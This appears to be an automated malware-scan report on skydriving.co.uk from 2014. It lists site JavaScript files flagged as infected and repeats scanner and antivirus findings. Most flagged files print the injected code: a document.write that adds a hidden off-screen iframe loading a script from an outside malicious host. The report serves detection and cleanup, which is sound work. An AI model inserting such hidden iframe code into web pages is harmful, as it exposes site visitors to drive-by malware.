Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skydriving.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://skydriving.co.uk/ | 200 OK Content-Length: 165259 Content-Type: text/html | clean |
http://skydriving.co.uk/media/system/js/caption.js | 200 OK Content-Length: 2144 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1115 bytes skipped]... ntainer.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/templates/yoo_vox/lib/js/addons/base.js | 200 OK Content-Length: 1952 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1429 bytes skipped]... on|initialize|Class|leaveFx|Options|YOOMorph|leave|window|document|ie6|timer|setStyle|linear|9000|999999|FFFFFF|effects|Element|length|expoOut|periodical|getElementsBySelector|return|Styles|undefined|mouseleave|mouseenter|contains|background|500|px|matchHeight|null|color|chk|YOOBase'.split('|'),0,{})) ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/templates/yoo_vox/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 1532 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[997 bytes skipped]... ordion|createDefault|defined|ul|bind|toggleClass|YOOAccordionMenu|hasClass|chain|switch|case|slide|break|Class|initialize|implement|onBackground|toggle|setOptions|onActive|addEvent|250|all|duration|linear|Transitions|click|extend|Options|transition|hide|accordionMenu|Accordion|Slide'.split('|'),0,{})) ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/templates/yoo_vox/lib/js/addons/fancymenu.js | 200 OK Content-Length: 2848 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2317 bytes skipped]... |slideOffset|onLeaveItem|mouseleaveItem|dur|clickItem|onClick|mouseenterItem|visibility|dropdown|getElements|each|level1|Transitions|implement|500|wait|Events|Fx|30|mouseleave|transition|visible|Event|initialize|sineInOut|injectInside|Options|click|mouseenter|setStyles|dropdownleave'.split('|'),0,{})) ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/templates/yoo_vox/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 3005 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2487 bytes skipped]... ain|margin|getElement|delaytime|wait|linear|return|matchUlHeight|addClass|Transitions|null|600|setOptions|initialize|Class|default|ul|800|box4|duration|transition|opera|removeClass|switch|delay|extend|ie|Options|clear|implement|matchHeight|getParent|slide|true|level2|Events|hasChild'.split('|'),0,{})) ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/templates/yoo_vox/lib/js/template.js | 200 OK Content-Length: 2637 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2041 bytes skipped]... 20); YOOBase.matchHeight('div.mainbottombox div.deepest', 20); YOOBase.matchHeight('div.contenttopbox div.deepest', 20); YOOBase.matchHeight('div.contentbottombox div.deepest', 20); } } }; window.addEvent('domready', YOOTemplate.start);document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/components/com_jxtcprimetime/jxtcswfobject.js | 200 OK Content-Length: 10025 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: kkuehliy.freewww.biz ...[3691 bytes skipped]... length;r++){if(t[r].substring(0,t[r].indexOf("="))==v){return g(t[r].substring((t[r].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(A&&M){var q=C(m);if(q){q.parentNode.replaceChild(M,q);if(l){W(l,true);if(h.ie&&h.win){M.style.display="block"}}M=null;l=null;A=false}}}}}();document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Decoded script: function E() { if (e) { return; } if (h.ie && h.win) { var v = a("span"); try { var u = K.getElementsByTagName("body")[0].appendChild(v); u.parentNode.removeChild(u); } catch (w) { return; } } e = true; if (Z) { clearInterval(Z); Z = null; } var q = o.length; for (var r = 0; r < q; r++) { o[r](); } } <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe> Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/plugins/content/jw_allvideos/includes/players/wmvplayer/silverlight.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://skydriving.co.uk/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://skydriving.co.uk/plugins/content/jw_allvideos/includes/players/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24191 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: kkuehliy.freewww.biz ...[4077 bytes skipped]... n+":"+str; hrs > 0 ? str = hrs+":"+str: null; return str; } jeroenwijering.utils.spanstring = function(stp) { var hrs = Math.floor(stp/3600); var min = Math.floor(stp%3600/60); var sec = Math.round(stp%60*10)/10; var str = hrs+':'+min+':'+sec; return str; };document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Decoded script: <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe> Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/plugins/content/jw_allvideos/includes/players/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8708 Content-Type: application/javascript | malicious |
Page code contains blacklisted domain: kkuehliy.freewww.biz ...[3539 bytes skipped]... rateOBJECTText_XHTML() { return _QTGenerate("QT_GenerateOBJECTText_XHTML", true, arguments); } function QT_WriteOBJECT() { document.writeln(_QTGenerate("QT_WriteOBJECT", false, arguments)); } function QT_WriteOBJECT_XHTML() { document.writeln(_QTGenerate("QT_WriteOBJECT_XHTML", true, arguments)); } ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/plugins/content/jw_allvideos/includes/jw_allvideos.js | 200 OK Content-Length: 6951 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: kkuehliy.freewww.biz ...[3999 bytes skipped]... elm.replace( /\t/g, '' ); elm = elm.replace( /\&/g, '&' ); elm = elm.replace( /\</g, '<' ); elm = elm.replace( /\>/g, '>' ); elm = elm.replace( /\"/g, '"' ); elm = elm.replace( /\'/g, "'" ); return elm; } } ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Decoded script: <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe> Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
http://skydriving.co.uk/modules/mod_flashmod/mod_flashmod.js | 200 OK Content-Length: 3957 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: kkuehliy.freewww.biz ...[3462 bytes skipped]... args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe>'); Decoded script: <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"></iframe> Malicious iFrame found. size: 101x101 src: http://kkuehliy.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://kkuehliy.freewww.biz/yrehwegweg.cgi?3"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skydriving.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 13:41:27 GMT
Server: LiteSpeed
Content-Type: text/html
X-Powered-By: PHP/5.4.32
GET / HTTP/1.1
Host: skydriving.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 13:41:27 GMT
Server: LiteSpeed
Content-Type: text/html
X-Powered-By: PHP/5.4.32
Second query (visit from search engine):
GET / HTTP/1.1
Host: skydriving.co.uk
Referer: http://www.google.com/search?q=skydriving.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skydriving.co.uk
Referer: http://www.google.com/search?q=skydriving.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.